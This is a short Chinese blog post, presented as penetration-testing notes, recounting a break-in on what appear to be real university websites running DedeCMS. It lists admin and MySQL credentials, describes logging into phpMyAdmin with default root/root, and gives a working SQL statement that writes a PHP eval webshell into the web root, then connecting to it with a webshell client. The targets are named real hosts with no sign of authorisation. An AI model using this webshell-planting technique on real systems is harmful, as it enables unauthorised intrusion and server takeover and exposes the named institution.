滲透測試筆記
今天朋友在入侵織夢的網(wǎng)站系統(tǒng),通過最新的Exp獲得了織夢后臺的賬號和密碼
賬號:admin
密碼:abc123456
但是,找來找去找不到后臺,就讓我提權(quán)試試。
我看了下:http://pxc.ncist.edu.cn/dede/
后臺被刪除了!怎么辦??
google hack也沒找到后臺
后來,我試了試這個網(wǎng)站:http://zsjy.ncist.edu.cn/phpmyadmin
輸入默認(rèn)MySql賬號與密碼:
賬號:root
密碼:root
居然進(jìn)去了:
接下來就是phpmyadmin提權(quán)了:
我的思路是:
1.先爆出php服務(wù)器www的路徑
2.然后通過將php一句話插入數(shù)據(jù)庫再導(dǎo)出到www路徑
通過google hack爆到路徑:D\www\
呵呵,接下來就執(zhí)行sql語句:
CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL ); INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>'); SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php'; |
這段sql意思是:
1.在mysql數(shù)據(jù)庫中建一張表叫xss,在xss表中生成一個field(字段)叫xss1
2.將php一句話木馬插入數(shù)據(jù)庫中的xss1字段處
3.將數(shù)據(jù)庫中xss1字段的內(nèi)容導(dǎo)出到d:\www\x.php文件中
這下,通過chopper連接x.php小馬得到shell:
posted on 2014-04-24 10:21 順其自然EVO 閱讀(509) 評論(0) 編輯 收藏 所屬分類: 測試學(xué)習(xí)專欄 、安全性測試